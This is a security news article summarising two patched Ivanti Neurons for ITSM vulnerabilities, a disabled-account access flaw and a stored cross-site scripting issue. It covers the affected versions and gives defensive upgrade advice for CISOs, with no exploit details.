Search

Ivanti Neurons for ITSM Vulnerabilities Allow Remote Attacker to Obtain User Sessions

Cyber threats and incidents
By Evan Rowe

Related

Share

What happened

Ivanti released security updates for two vulnerabilities in Ivanti Neurons for ITSM that could allow remote authenticated attackers to retain unauthorized access or obtain information from other users’ sessions. The first flaw, CVE-2026-4913, is an improper path protection issue that affects Ivanti Neurons for ITSM versions prior to 2025.4 and could allow a remote authenticated attacker to keep access even after an administrator disables the account. The second flaw, CVE-2026-4914, is a stored cross-site scripting vulnerability that can let a remote authenticated attacker inject malicious scripts that execute in the context of other users’ sessions. Ivanti said both issues are patched in version 2025.4 and that it is not aware of any active exploitation at the time of disclosure.

Who is affected

The direct exposure affects organizations using Ivanti Neurons for ITSM version 2025.3 and all prior releases, across both on-premise and cloud deployments. Ivanti said cloud customers do not need to take action because fixes were applied to all cloud environments on December 12, 2025, while on-premise customers must manually upgrade to version 2025.4.

Why CISOs should care

This matters because the flaws affect access control and session security inside an IT service management platform that can hold sensitive operational data and privileged workflows. One issue can allow a disabled user to retain access, while the other can enable cross-session information theft if another user opens malicious content.

3 practical actions

Upgrade on-premise deployments: Move Ivanti Neurons for ITSM on-premise environments to version 2025.4 as soon as possible.

Review disabled-account controls: Check whether recently disabled users or offboarded accounts may still have access paths that need to be verified and closed.

Watch for malicious session content: Investigate whether stored content inside the platform could be used to trigger script execution in other users’ sessions.

For more news about security flaws that can affect access control and enterprise systems, click Vulnerability to read more.

Previous article
OpenAI Launches GPT-5.4-Cyber With Reverse Engineering, Vulnerability Research, and Malware Analysis Features
Next article
CISOs to Watch in Washington’s State Government
Founders, Analysts & Industry Voices

CISOs to Watch in Washington’s City and County Government

Washington’s city and county governments rely on CISOs who...
Founders, Analysts & Industry Voices

CISOs to Watch in Washington’s State Government

Washington’s state government depends on CISOs who can protect...

Subscribe to our stories

To be updated with all the latest news, offers and special announcements.